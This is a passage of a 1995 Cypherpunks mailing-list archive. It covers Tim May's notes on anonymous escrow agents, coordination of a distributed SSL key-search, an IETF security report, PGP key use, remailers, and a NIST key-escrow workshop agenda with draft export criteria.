to in a recent message is. It's been a while since I mentioned it, so I'll
give some details.

In late 1993 I foolishly committed to doing a "Cypherpunks FAQ," as several
earlier attempts had gone nowhere. And since the most frequently asked
question of all is always "Where's the FAQ?," followed closely by "How come
there isn't a FAQ?," the need was there. (As it turns out, the people most
in need of a FAQ seldom read FAQs, but this is another story.)

I finished my first release, a megabyte-sized file done in MORE, a powerful
outline processor (which enabled me to maintain notes, make
cross-references, and generally manage such a huge writing project). I
released it last year, and put it in my anonymous ftp account at
ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
is often very crowded, though.

I know of a couple of alternative places. A very nice job of HTMLizing it
was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL

http://www.oberlin.edu/~brchkind/cyphernomicon/

Another URL, which is just one large file, is

http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ


The recent thread about the dangers of anonymity and the role of escrow
agents as possible fixes is a good excuse to include one of my
sub-sub-subsections, to also illustrate the structure and expected
contents.

Enjoy it. But, please, don't nag me with suggestions that I should do, or
should have done, the thing in HTML, or using your favorite tool set.

--Tim May


Crypto Anarchy:
Escrow Agents and Reputations



  16.24.1. Escrow Agents as a way to deal with contract renegging
           - On-line clearing has the possible danger implicit in all
              trades that Alice will hand over the money, Bob will verify
              that it has cleared into hisaccount (in older terms, Bob
              would await word that his Swiss bank account has just been
              credited), and then Bob will fail to complete his end of
              the bargain. If the transaction is truly anonymous, over
              computer lines, then of course Bob just hangs up his modem
              and the connection is broken. This situation is as old as
              time, and has always involved protcols in which trust,
              repeat business, etc., are factors. Or escrow agents.
           - Long before the "key escrow" of Clipper, true escrow was
              planned. Escrow as in escrow agents. Or bonding agents.
           - Alice and Bob want to conduct a transaction. Neither trusts
              the other;
              indeed, they are unknown to each other. In steps "Esther's
              Escrow Service." She is _also utraceable_, but has
              established a digitally-signed presence and a good
              reputation for fairness. Her business is in being an escrow
              agent, like a bonding agency, not in "burning" either
              party. (The math of this is interesting: as long as the
              profits to be gained from any small set of transactions is
              less than her "reputation capital," it is in her interest
              to forego the profits from burning and be honest. It is
              also possible to arrange that Esther cannot profit from
              burning either Alice or Bob or both of them, e.g., by
              suitably encrypting the escrowed stuff.)
           - Alice can put her part of the transaction into escrow with
              Esther, Bob can do the same, and then Esther can release
              the items to the parties when conditions are met, when both
              parties agree, when adjudication of some sort occurs, etc.
              (There a dozen issues here, of course, about how disputes
              are settled, about how parties satisfy themselves that
              Esther has the items she says she has, etc.)
  16.24.2. Use of escrow services as a substute for government
           + as in underworld deals, international deals, etc.
             - "Machinery of Freedom" (Friedman), "The Enterprise of
                Law" (Benson)
           - "It is important to note in any case that the use of third-
              party escrow as a substitute for Government regulation was
              a feature of the Northern European semi-anarchies of
              Iceland and Ireland that have informed modern libertarian
              thought." [Duncan Frissell, 1994-08-30]
  16.24.3. Several people have raised the issue of someone in an
            anonymous transaction simply taking the money and not
            performing the service (or the flip side). This is where
            _intermediaries_ come into the picture, just as in the real
            worl (bonds, escrow agents, etc.).
  16.24.4. Alice and Bob wish to conduct an anonymous transaction; each
            is unknown to the other (no physical knowledge, no pseudonym
            reputation knowledge). These "mutually suspicious agents," in
            1960s- and 70s-era computer science lingo, must arrange
            methods to conduct business while not trusting the other.
  16.24.5. Various cryptographic protocols have been developed for such
            things as "bit commitment" (useful in playing poker over the
            phone, for example). I don't know of progress made at the
            granularity of anonymous transactions, though. (Though the
            cryptographic protocol building blocks at lower levels--such
            as bit commitment and blobs--will presumably be used
            eventually at higher levels, in markets.)
  16.24.6. I believe there is evidence we can shorten the cycle by
            borrowing noncryptographic protocols (heresy to purists!) and
            adapting them. Reputations, for example. And escrow agents (a
            form of reputation, in that the "value" of a bonding entity
            or escrow agent lies in reputation capital).
  16.24.7. if a single escrow agent is suspected of being untrustworthy
            (in a reputation capital sense), then can use _multiple_
            escrows
           - with various protocols, caveat emptor
           - n-out-of-m voting schemes, where n escrow agents out of m
              are required to complete a transaction
           - hard to compromise them all, especially if they have no
              idea whether they are being "legitimately bribed" or merely
              pinged by a reputation-rating service
           - Hunch: the work of Chaum, Bos, and the Pfaltzmanns on DC-
              nets may be direcly applicable here...issues of collusion,
              sets of colluders, detection of collusion, etc.




---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 1 Sep 95 21:58:01 PDT
To: cypherpunks@toad.com
Subject: Re: SSL attack
Message-ID: <199509020358.VAA00340@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: "Robert A. Rosenberg" <hal9001@panix.com>

>I thought that the ACK gives starting location and number of segments. If I
>get 500 segments and ACK at the 50% point I am sending an ACK for the
>Starting Point and 250 Segments (the unprocessed part would then ACK

With multiple heirchical servers, you don't have the same bottleneck 
problems. If you have a random mode that you can switch into, same deal
(if you care to use it). There are a lot of people who want the anonymity
and server-independance of random mode. There are people who don't want
to add another 37% onto the processing time, given the unlikeliness of
a D.O.S. attack on the server. I continue to support the idea of a 
two-pronged attack using both methods.

Given that most of the server bottleneck was un-updated clients anyway,
I think that the bottleneck-on-the-server problem is solved anyway, 
meaning there won't be any problems getting new keys - thus eliminating
the need for a keyspace buffer queue.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEfVssLa+QKZS485AQEV9QMAoue7RyySe1H0a7s6hBkjf7knaXesLY1h
ZQg9rBZ9ZieJ5qWyBHL03Gn4XikSD8U6/MBbiyMvOnz+QTYRQcMxQioEu4YDcFdD
etaful6wYhtXzd/MTn+VWjBf86poDeNK
=Mp2o
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Sep 95 20:02:30 PDT
To: cypherpunks@toad.com
Subject: IETF security report
Message-ID: <9509020301.AA17722@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From saag-request@neptune.tis.com Fri Sep  1 19:09:55 1995
Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by postman.osf.org (8.6.9/8.6.x) with SMTP
	id TAA08164 for <rsalz@osf.org>; Fri, 1 Sep 1995 19:09:54 -0400
Received: from neptune.tis.com by neptune.TIS.COM id aa06599; 1 Sep 95 16:20 EDT
Received: from relay.tis.com by neptune.TIS.COM id aa06595; 1 Sep 95 16:18 EDT
Received: from big-screw.mit.edu(18.72.0.176) by relay.tis.com via smap (g3.0.1)
	id xma004617; Fri, 1 Sep 95 16:07:54 -0400
Received: by big-screw 
	id AA23873; Fri, 1 Sep 95 16:18:03 -0400
Date: Fri, 1 Sep 95 16:18:03 -0400
Message-Id: <9509012018.AA23873@big-screw>
>From: "Jeffrey I. Schiller" <jis@mit.edu>
Sender: jis@mit.edu
To: minutes@cnri.reston.va.us
Subject: IETF Security Area Report (July 17-21, 1995: 33rd IETF meeting)
Cc: secdir@TIS.COM, saag@TIS.COM
Status: R

-----BEGIN PGP SIGNED MESSAGE-----

                       IETF Security Area Report
                      Jeff Schiller and Jim Galvin
                              jis@mit.edu
                             galvin@tis.com

                            July 17-21, 1995

The Security  Area  within the  IETF is responsible  for  development of
security oriented protocols,  security  review of RFCs,  development  of
candidate policies, and review of operational security on the Internet.

The Area Director is assisted by a Directorate,  an advisory entity with
no standards-setting powers.   The  members of the Security  Directorate
are as follows.

        Jeffrey I. Schiller <jis@mit.edu>
        Ran Atkinson <atkinson@itd.nrl.navy.mil>
        Steve Bellovin <smb@research.att.com>
        Steve Crocker <crocker@tis.com>
        Barbara Fraser <byf@cert.org>
        James M. Galvin <galvin@tis.com>
        Phil Karn <karn@qualcomm.com>
        Steve Kent <kent@bbn.com>
        John Linn <linn@ov.com>
        Clifford Neuman <bcn@isi.edu>
        Rob Shirey <shirey@mitre.org>
        Ted Ts'o <tytso@mit.edu>

In addition to  the  Directorate the  Security  Area is assisted by  the
Security  Area  Advisory Group (SAAG).  The  SAAG  is an open group that
meets at  least once during each IETF  meeting as well as electronically
via the   saag@tis.com mailing list.    Send  a message  to  the address
saag-request@tis.com to join the list.

During the  Security Area Advisory Group  (SAAG) meeting, the activities
of the Security  Area,   including  the Directorate, are    reported and
discussed.  In addition, the   SAAG meeting provides an  opportunity for
open discussion of security issues.

Included below is a  summary from those working  groups  and birds of  a
feather  sessions  with security relevant activities  to  report and the
Security Directorate meeting summary.  In addition, the following topics
were discussed during the SAAG meeting.

o Documents Approved as Proposed Standards

  The  IESG approved the  advancement of five  of the IPSEC documents to
  proposed standards.  With the advancement of these documents the IPSEC
  working group will focus on issues related to key management.

  The  IESG approved   the  advancement of  the  two  MOSS  documents to
  proposed standards.  With the  advancement of these documents  the PEM
  working group has completed its charter and will be closed.

o Domain Name System Security

  The last revision of the enhancements for the  DNS to support security
  has been  released.  It will enter  working group last call very soon;
  no issues are expected to be raised.  At  the end of the working group
  last call the document will be submitted to  the IESG to be considered
  for publication  as a Proposed  Standard.   An implementation  of  the
  specification is available to U.S.  and Canadian sites and individuals
  via anonymous      FTP (see   ftp://ftp.tis.com/pub/DNSSEC/README  for
  details).

o Key Management

  It was noted that the Internet needs two kinds  of key management: one
  for short-term keys and one for long-term keys.  The expected usage of
  short-term keys would be  on a  per connection  or per message  basis.
  Long-term keys, on the other hand, would probably be used to exchanged
  short-term keys.

  The  distribution and management    of  long-term keys   requires  the
  existence of a  global infrastructure.  There are  two options for the
  global infrastructure today: Secure DNS or  The Directory (X.500).  It
  is  also possible that something   completely different will be needed
  and developed.

  Key management is expected to get increasing attention in the IETF.

o Internet Security Architecture

  Steve Crocker  gave an abbreviated version of  his presentation to the
  IAB the previous  evening.  He posed  a challenge to the community  to
  improve the network security at  IETF meetings.  The specific proposal
  is  to have IPSEC available with  manual keying, which would be enough
  to make a difference when compared to the current configuration.  This
  should be  available for use in   the IETF terminal  room  by both the
  terminals/workstations and laptops.  In addition,  we should install a
  demonstration firewall that is IPSEC friendly.  The goal is to make it
  available at the next IETF meeting in Dallas (December 4-8, 1995).

The  activity  of the following working  groups  and  birds of a feather
sessions was reported.

o Secure Socket Layer (SSL) BOF

  A consensus   developed  for the   need for  a session layer  security
  protocol.  This was predicated on   observing that IPSEC is below  the
  transport  layer and  the   session  layer is    above  it,  and  that
  implementing security in the transport or  network layer would require
  changes to  operating systems.   In  contrast, session  layer security
  could be  implemented and added   non-invasively to existing  systems,
  thus making  security   services  available to     a broad range    of
  application protocols.

  As a result, a working  group called Session   Layer Security will  be
  proposed.  The Secure  Socket Layer  specification  will serve as  the
  starting point for the new working group.

o Internet Secure Payments Protocol (ISPP) BOF

  This  BOF    met  two times with     more   than a   dozen  technology
  presentations.  Fortunately, the  various technologies  are much  more
  similar than they are different.

  The consensus was that the IETF should have one or more working groups
  in this  area.   Charters will be  proposed and  submitted to the area
  director for consideration.

o Simple Key Management for IP (SKIP) BOF

  SKIP is  Sun's proposal for  key management on  the Internet.  It is a
  competitor to the   Photouris specification being discussed  in IPSEC.
  It is  still  undecided as  to  whether  this specification should  be
  discussed as part of the IPSEC working group or within its own working
  group.

  Although there appeared to be consensus to move the SKIP specification
  onto the standards track, the authors will need to discuss the process
  and relationship to IPSEC with the area director and the Chairs of the
  IPSEC working group before this can be done.

  [Note: Since  the  IETF  meeting took  place  discussions  between the
   various parties are proceeding.  The  likely outcome will be for  the
   SKIP work to take place within the IPSEC working group.]

o Authenticated Firewall Traversal (AFT)

  There  are     currently    four    implementations   underway    with
  interoperability testing expected to begin shortly.  If the testing is
  successful three  documents   will be submitted   to  the IESG to   be
  considered for publication as Proposed  Standards before the next IETF
  meeting in Dallas.

o Common Authentication Technology (CAT)

  The CAT  working group discussed  topics related to  active documents,
  including GSS-V2 (to receive another set  of specific revisions at the
  Internet-Draft  level, and then  to be  recommended for advancement to
  Proposed Standards),  IDUP (where revised interface specifications and
  a   new    mechanism specification   were   discussed,  with standards
  advancement to be considered at the  Dallas IETF), GSS-API Negotiation
  (new  draft discussed), Kerberos mechanism  and extensions (status and
  comments  discussed,  new  drafts  to follow),  FTP   Security (to  be
  recommended  for advancement to Proposed   Standard after inclusion of
  clarifying revisions), and a presentation of a  new mechanism based on
  FIPS PUB JJJ cryptography.  Presentations on work in progress included
  GSS-API integration into World-Wide Web browsers and servers, loadable
  GSS-API multi-mechanism support, and discussion of the use of RFC-1731
  as   a   generic framework for   integration  of  security tokens into
  text-based  applications.    The  group  also  discussed   a range  of
  candidate  follow-on  topic   areas related  to   authorization,   and
  identified a  subset  with apparent common  value and  feasibility for
  proposals and work by group members.

o Web Transaction Security (WTS)

  There were three short presentations on related  subjects and a review
  of  the two  documents  being developed by  the  working  group.  With
  respect to  the requirements  specification,  several new  issues were
  raised at this  meeting and most, but  not all, were  resolved.  There
  was consensus to  resolve the remaining  issues  on the  list and then
  submit the document to the IESG to be considered for publication as an
  information RFC.

  Recent changes  to the SHTTP document were  reviewed and no objections
  were  raised.  An outstanding issue   is coordinating SHTTP with MOSS,
  which is dependent  on the harder  (and outside our scope) problem  of
  coordinating HTTP with  MIME.  We  remain hopeful  that we will  reach
  consensus on a document to propose to  advance to Proposed Standard by
  the next IETF meeting Dallas.

o IP Security (IPSEC)

  The   interoperability  testing  of   the  recently  approved Proposed
  Standards  was discussed.  The majority  of the meeting was devoted to
  discussing Internet key management  and  the two working documents  on
  Photouris and ISAKMP.

o Site Security Handbook (SSH)

  Two documents are   expected to  be available  by  the  first week  of
  November,  which will allow for  final revisions to be proposed during
  the  next IETF meeting in Dallas  followed  by advancing the documents
  onto the standards track as quickly as possible.

The Security Area   Directorate met on Monday   afternoon for a 2   hour
meeting.  In addition to all of the above, the following was noted.

o Intellectual Property Rights (IPR)

  The    purpose of the discussion was    information exchange.  Several
  protocols are pending in the IESG as a result of unresolved IPR issues
  and several protocols from the security area are about to be submitted
  to the IESG with unresolved IPR  issues.  It is uncertain exactly what
  the outcome will be of any specific case.

o Key-ed MD5

  Key-ed MD5 is being used in a variety of protocols for authentication.
  The IETF needs an applicability statement which includes advice on how
  often to change the secrets.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEdqFMUtR20Nv5BtAQELhwP/eTwVc+07AA19P0Q7KdfHxTAaNjnsPBRY
4bb2ekatHDaL5oVH2bbad1DECgOVU2Y0tKBXBNO3Pw1vQiMOV874ZeMIWNtcuxJE
MUcd9PLXekRoIUGmUdQMdnVhGEhb4NWPAi6KXzkWRxLN0wZNG9tyjkb7qLCo0dLe
+98gDe4dO1c=
=2CtY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Sep 95 23:33:08 PDT
To: cypherpunks@toad.com
Subject: Re: Direct Socket to Remailer?
Message-ID: <ac6da5d1010210040573@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
>I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
>The procedure, quite frankly, sounds rather complicated.
>
>Most of my mail that I don't want traced goes through the Mixmaster
>remailer network.  I'm using Winsock-compatible software via a PPP
>connection.  Is it possible, for example, to tell my mailer software
>to use the remailer itself, such as "remail.obscura.com" as the mail
>host, rather than "mail.myISP.com"?  Will it work, at least for
>sending, without having an account at "obscura.com", or whatever
>remailer?  Would that be less traceable than sending it through my
>ISP's mail host?

I don't think it would provide much more security, but it might keep you
ISP from logging the mail. If you are using mixmaster@remail.obscura.com as
your remailer, you are welcome to use it as the mail host for that mail.
It is a slow connection so please do not use is as your regular mail host.

You should try the telnet port 25 trick. It is amazingly simple (but not
secure). Just "telnet some.machine.com 25" and type help. It will guide you
through it. It is quite informative.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:08 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <v02130503ac6d34180345@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 9/1/95, Bill Stewart wrote:
>>I do not think that PGP 2.x can easily (ie: Automatically) use one key for
>>Signing and another for Encrypting a Message (it does both at the same time
>>if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
>>the result but I'm not sure if doing the decrypt on such a message will
>>automatically spot the signature and verify it (as would occur with a E+S
>>pass).
>
>PGP identifies the key for decryption and signature checking from the message.
>When you're signing a message or key, you can pick which of your keys to
>use with the -u option.

OK - I'll rephrase my query/quandary. If I create a message by feeding in
plain text and asking for an Encrypt and Sign is the FORMAT of the
resulting file different from one there I Sign the Text and then (in a
separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut
for the two processes done in sequence using the same key for both
operations)? If E+S is only a short-cut then doing the steps separately
will give the result that PGP3 will get automatically with its Separate
Function Keys Feature.

>The difficulty is getting people to use your
>encryption key instead of your signature key when encrypting stuff for you.
>Derek mentioned one approach (get people to load the encryption key first);
>unfortunately, you can't predict their behavior, and if you change encryption
>keys more often than signature keys, they'll load the newest encryption key
>last.
>Another approach is to identify them in the names - my key certification key
>says "KeyCert-only" in the text.
>
>For the problem that started this discussion, though, there's no good solution.
>Since the Bad Guys _can_ encrypt a message to you with your signature key,
>and send it to you by anonymous remailer, they can plant a reason to suspect
>that you may have evidence encrypted with that key.

This will all become (more) academic once PGP3 comes out and Sign-Only keys
would not be usable for Encryption.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:36 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
Message-ID: <v02130504ac6d39583ee9@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 9/1/95, Daniel R. Oelke wrote:
>>
>> I see nothing wrong with the concept of being allocated an initial chunk
>> and having the scan software attempt to ACK it when 50% of it has been
>> searched. A successful ACK would allow the releasing of a new chunk (in
>> response) equal in size to the returned chunk. A failure of the Server to
>> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
>> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
>> in possession of a Full Sized Chuck to scan (so long as the Server accepts
>> an ACK before the 100% done mark) and temporary failures will not stop the
>> process of a scanner as currently happens.
>>
>
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then latter the server is ACKed for the full 100%.
>
>Why?  Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.

I thought that the ACK gives starting location and number of segments. If I
get 500 segments and ACK at the 50% point I am sending an ACK for the
Starting Point and 250 Segments (the unprocessed part would then ACK
Start+250 for 250 when done) Just as of I had only gotten 250 in the first
place and was also given the next 250 Segment Chunk (ie: I was "Next
Requester" after my original allocation of 250).

>IMO - a % ACK is to much complexity and extra work on the server,
>which is already having trouble keeping up.

No - It is the same load if you allow the first request to be twice the
size of the subsequent requests. If you ask people to request 30 minutes
worth of segments, there is no difference in load (if the Server responds
to each ACK when first attempted) if they start each run with a 1 hour
chunk (ie: 2X Chunk) and check in every 30 min to ACK a Chunk (and to get
the one to be worked on in a half an hour [and when you are 30 minutes away
from your shut down time, just ACK and do not request another chunk]) and
just getting a X sized chunk at your initial connection.

In the 2X method, you still have a X sized Chunk to work on for the next 30
Minutes if the Server is ignoring your ACK attempt (and when that Chunk has
been scanned you return both and get two more). This is hitting the Server
once every 30 minutes and NOT pounding away at it until you get an ACK
through (and more get more work) since you have no need for another chunk
immediately (as you would with the X sized Chunk every 30 minutes method)
and thus have no need to retry on a connect failure.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:32 PDT
To: Lou Poppler <lwp@mail.msen.com>
Subject: Re: SSL search attack
Message-ID: <v02130505ac6d4038dc74@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 9/1/95, Lou Poppler wrote:
>The ACK process and the allocation process are separate, and should
>remain so.  They run on different servers, and they run as separate
>processes in the unix version of brloop.  A little tweaking of brloop
>could allow pre-fetching of the next segment to search, without any
>effect on the ACK process.  I dislike the idea of a client sending an ACK
>before it has searched the entire segment.

I was not suggesting that. I was just suggesting that the initial request
be for twice the amount of segments as you want to process during your
reporting interval and that except when you are getting ready to shut down,
you have one allocation ready as a spare in case you can't immediately be
given another allocation when you ACK one.

Example: I will be running for 8 Hours and I will report back every 30
minutes. I get an Hours worth of segments (Chunk 1 +2) when I first
connect. After 30 Minutes, I'm done with half of them. I then ACK that half
(Chunk1) and request another 30 minutes worth of segments (for scanning at
1H-1.5H). If I do not get it, I'm still working on the 2nd Chunk. At 1H, I
ACK Chunk2 and ask for Chunk4 (also I ACK Chunk 1 and/or request Chunk 3 if
either failed the first time at .5H). This continues until 7.5 when I ACK
and do not request a Chunk 17 (since I already have or I am requesting
Chunk 16 for the 7.5H-8H period).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curran <jcurran@bbnplanet.com>
Date: Fri, 1 Sep 95 22:33:03 PDT
To: "Todd Glassey, Chief Technologist, Looking Glass Technologies" <todd@lgt.com>
Subject: Re: FSTC - Request for Info
Message-ID: <v02120d03ac6d9c8d319a@[192.52.71.147]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:05 AM 9/2/95, Todd Glassey, Chief Technologist, Looking Glass Technologies wrote:
>Hi all,
> I am now looking for pointers into this mystical coonsortium of financial
>wizards...  

A good place to start is the FSTC WWW pages: http://www.llnl.gov/fstc
/John






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 02:15:27 PDT
To: cypherpunks@toad.com
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <v01510100ac6dcfd46ccc@[198.59.115.135]>
MIME-Version: 1.0
Content-Type: text/plain


>I finished my first release, a megabyte-sized file done in MORE, a powerful
>outline processor (which enabled me to maintain notes, make
>cross-references, and generally manage such a huge writing project). I
>released it last year, and put it in my anonymous ftp account at
>ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
>is often very crowded, though.

After several tries I was not able to get this.  Has anyone made it
available in an alternate location?

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Sep 95 18:30:25 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Workshop agenda & discussion paper 3
Message-ID: <199509020130.DAA17812@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Key Escrow Workshop agenda & discussion paper 3


September 1, 1995


Dear Participant:


Thank you for agreeing to participate in the two-day
meeting on software key escrow encryption.  We are
anxious to work with you and other industry
representatives to facilitate development of exportable
key escrow encryption in software products.  I look
forward to the workshop being an important step in that
process.


I have attached a draft agenda for the two days.  I
propose that we spend the majority of our time discussing
a set of export criteria.  In order to move that
discussion along, a draft set of criteria is attached. 
The criteria state, in general terms, the government's
needs with respect to exportable software, consistent
with its law enforcement and national security
requirements.  Since it is important that the final
criteria be clear, straightforward, consistent, and
implementable, Mike Nelson of the Office of Science and
Technology Policy will spend a few minutes describing
these criteria on the first morning of the meeting. 
After that, we would like to hear your perspectives on
them and work with you to refine them.  On the second
day, we plan to discuss the export licensing process for
such products, and begin exploring characteristics of
acceptable key escrow agents.


Again, thank you for your participation.  I look forward
to seeing you there.


Sincerely,

/ s /


Raymond G. Kammer
Deputy Director


Attachments


--------------------------------------------------------


TENTATIVE AGENDA


Key Escrow Issues Meeting


September 6-7, 1995
National Institute of Standards and Technology
Gaithersburg, Maryland


Wednesday, September 6, 1995


9:00          Welcome, Agenda Overview, Logistics
              Ed Roback, NIST

9:10          Review of Meeting Goals
              Ray Kammer, NIST Deputy Director


Session I --  Software Key Escrow Exportability Criteria


9:20          Briefing -- Discussion Draft of Software
              Key Escrow Export Criteria
              Michael Nelson, Office of Science and
              Technology Policy

10:00         Industry Perspectives on Exportability
              Criteria

              (Industry briefings/reactions  5-10
              minutes max.)

10:45         Break

11:00         Industry Perspectives on Exportability
              Criteria, continued.

11:45         Discussion of Breakout Session Tasks

              At registration, you will be asked to sign
              up for a breakout session. 

              Groups A1, A2:       Criterion #2 

              Groups B1, B2:       Criteria #3, 4, 9

              Groups C1, C2:       Criteria #5, 6

              Groups D1, D2:       Criteria #7, 8

              Criterion #10 is the subject of Session
              II, and criterion #1 (64-bit) is
              straight-forward.  

              Breakout room assignments will be
              announced at this time.


12:00         Lunch (on own, cafeteria available)


1:00          Breakout session #1
                        
              Groups will be asked to: 

              1)  determine whether each criterion is
              clear and, if not, propose appropriate
              modifications;
                     
              2)  identify issues (which may arise from
              the criteria assigned to the group) which
              need to be addressed, and by whom; and

              3)  develop technical ideas/approaches for
              achieving each criterion.

3:00          Break

3:15          Plenary -- Reports from Breakout Session
              #1

4:00          Breakout Session #2

              Participants will be asked to select
              either a technical or criteria-focused
              group.   

              Technical groups are asked to:

              1)  synthesize the proposed technical
              approaches (just presented in plenary) and
              identify/discuss the most promising
              approaches.

              Criteria focused groups are asked to:

              1)  look at all criteria and the
              comments/issues raised and propose ways to
              reconcile any differences; and
       
              2)  prioritize the issues that remain to
              be addressed, if any, for each criterion.

5:00          End of day


Thursday, September 7, 1995


9:00          Plenary -- Reports from Breakout Session
              #2

9:45          Export Licensing Process
              Randy Williams, U.S. Dept. of Commerce
              Dan Cook, U.S. Dept. of State

10:15         Questions / Discussion

10:30         Break


Session II -- Desirable Characteristics for Key Escrow
              Agents


10:45         Panel: Government Perspectives on Key
              Escrow Agent Issues
              Geoff Greiveldinger, U.S. Dept. of Justice
              Ray Kammer, NIST
              Penny Brummitt, NSA  

11:30         Industry Perspectives on K.E. Agent Issues

12:30         Lunch (on own, cafeteria available)

1:30          Breakout Session #3

              Each group is asked to identify proposed
              key criteria for desirable escrow agents. 
              Same groups and room assignments as
              Breakout session #1.

2:45          Break

3:00          Plenary - Report of Breakout Sessions


Session III -- Other Related Issues


3:30          Other Issues 

              This is an opportunity for participants to
              raise related key escrow issues.

4:30          Follow-up Issues & Wrap-up

4:45          Adjourn


Note:  The meeting will be open to the public, although
seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax:
301/948-1784 or e-mail: carlton@micf.nist.gov.          
             
_ _ _

9/1/95

                     
--------------------------------------------------------

Key Escrow Issues Meeting, September 6-7, 1995


Discussion Paper #3


Export Criteria Discussion Draft -- 64-bit Software Key
Escrow Encryption


As discussed at the SPA/AEA meeting on August 17, 1995,
the Administration is willing to allow the export of
software encryption provided that the products use
algorithms with key space that does not exceed 64 bits
and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents. On the same date,
the September 6-7 key escrow issues meeting at NIST was
also announced.  The two principal topics at the meeting
will be:  discussion of issues of exportability of 64-bit
software key escrow encryption and 2) desirable
characteristics for key escrow agents.


In order to help make most productive use of the limited
time available at the upcoming meeting and to better
focus deliberation, the following criteria are being
distributed for discussion purposes.  Since it is
important that final criteria be clear, straightforward,
consistent, and implementable, please review these draft
criteria and be prepared to discuss how they may be
refined and made more specific.


Draft Export Criteria for Software Key Escrow Encryption


Software key escrow encryption products meeting the
following criteria will be granted special export
licensing treatment similar to that afforded other
mass-market software products with encryption.


1.   The product will use an unclassified encryption
     algorithm (e.g., DES, RC4) with a key length not to
     exceed 64 bits.


2.   The product shall be designed to prevent multiple 
     encryption (e.g., triple-DES).


3.   The key required to decrypt each message or file
     shall be accessible through a key escrow mechanism
     in the product, and such keys will be escrowed
     during manufacture in accordance with #10.  If such
     keys are not escrowed during manufacture, the
     product shall be inoperable until the key is
     escrowed in accordance with #10.


4.   The key escrow mechanism shall be designed to
     include with each encrypted message or file, in a
     format accessible by authorized entities, the
     identity of the key escrow agent(s), and
     information sufficient for the escrow agent(s) to
     identify the key or key components required to
     decrypt that message.


5.   The product shall be resistant to any alteration
     that would disable or circumvent the key escrow
     mechanism, to include being designed so that the
     key escrow mechanism cannot be disabled by a static
     patch, (i.e., the replacement of a block of code by
     a modified block).


6.   The product shall not decrypt messages or files
     encrypted by non-escrowed products, including
     products whose key escrow mechanisms have been
